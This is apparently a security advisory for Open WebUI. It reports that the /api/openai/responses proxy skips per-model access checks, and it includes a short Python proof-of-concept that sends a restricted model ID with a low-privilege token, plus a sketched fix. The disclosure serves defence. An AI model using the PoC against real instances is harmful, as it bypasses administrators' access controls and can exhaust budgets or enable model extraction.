The /responses endpoint in the OpenAI router accepts any authenticated user and forwards requests directly to upstream LLM providers without enforcing per-model access control. While the primary chat completion endpoint (generate_chat_completion) checks model ownership, group membership, and AccessGrants before allowing a request, the /responses proxy only validates that the user has a valid session via get_verified_user.
This allows any authenticated user — regardless of role or group assignment — to interact with any model configured on the instance by sending a POST request to /api/openai/responses with an arbitrary model ID.
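A minimal proof-of-concept sketch of the bypass, assuming a placeholder instance URL and the session token of any low-privilege user; the payload shape follows the upstream OpenAI Responses API, and the restricted model name is only an example:

```python
import requests

BASE_URL = "https://open-webui.example.com"  # placeholder instance URL
TOKEN = "<any valid session token>"          # token of a low-privilege user

# The /api/openai/responses proxy only verifies the session, so a model ID
# the user was never granted access to is forwarded upstream anyway.
resp = requests.post(
    f"{BASE_URL}/api/openai/responses",
    headers={"Authorization": f"Bearer {TOKEN}"},
    json={
        "model": "o1-pro",  # a model the administrator restricted
        "input": "Hello",
    },
    timeout=60,
)
print(resp.status_code, resp.text[:200])
```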
Per the OWASP Top 10 for LLM Applications, this maps to the following risks:
Model Denial of Service (OWASP LLM04): An unauthorized user can submit resource-intensive requests to expensive models (e.g., o1-pro, GPT-4o) that the administrator explicitly restricted. In shared deployments, this can exhaust API budgets or rate limits, disrupting service for all legitimate users.
Model Theft (OWASP LLM10): If the instance proxies access to fine-tuned or self-hosted models, unauthorized users can freely interact with them, enabling capability extraction or model distillation without authorization.
Access Policy Bypass: Administrators lose the ability to enforce cost-tier restrictions, team-based model assignments, or compliance boundaries through the existing access control system.
The endpoint is a raw passthrough proxy and does not resolve workspace model configurations (system prompts, knowledge bases, RAG pipelines). Therefore, workspace-specific confidential data is not directly exposed through this vector.
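One way to close the gap, sketched below under stated assumptions, is to resolve the requested model ID and apply the same per-model authorization the chat completion path performs before proxying. Only get_verified_user is named in this advisory; check_model_access and forward_to_upstream are hypothetical placeholders for the existing access checks and proxy logic:

```python
from fastapi import APIRouter, Depends, HTTPException, Request

from open_webui.utils.auth import get_verified_user  # named in the advisory

router = APIRouter()


def check_model_access(user, model_id: str) -> bool:
    """Hypothetical helper: mirror the ownership, group membership, and
    AccessGrant checks that generate_chat_completion already performs."""
    ...


async def forward_to_upstream(request: Request, body: dict):
    """Placeholder for the existing raw passthrough proxy logic."""
    ...


@router.post("/responses")
async def responses_proxy(request: Request, user=Depends(get_verified_user)):
    body = await request.json()
    model_id = body.get("model")

    # Reject the request unless the caller is an admin or has been granted
    # access to the requested model, matching the chat completion path.
    if user.role != "admin" and not check_model_access(user, model_id):
        raise HTTPException(status_code=403, detail="Model not permitted")

    # Only an authorized request reaches the upstream provider.
    return await forward_to_upstream(request, body)
```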
PR: https://github.com/open-webui/open-webui/pull/23481
{
  "github_reviewed": true,
  "github_reviewed_at": "2026-05-08T19:45:53Z",
  "cwe_ids": [
    "CWE-284",
    "CWE-862"
  ],
  "severity": "HIGH",
  "nvd_published_at": null
}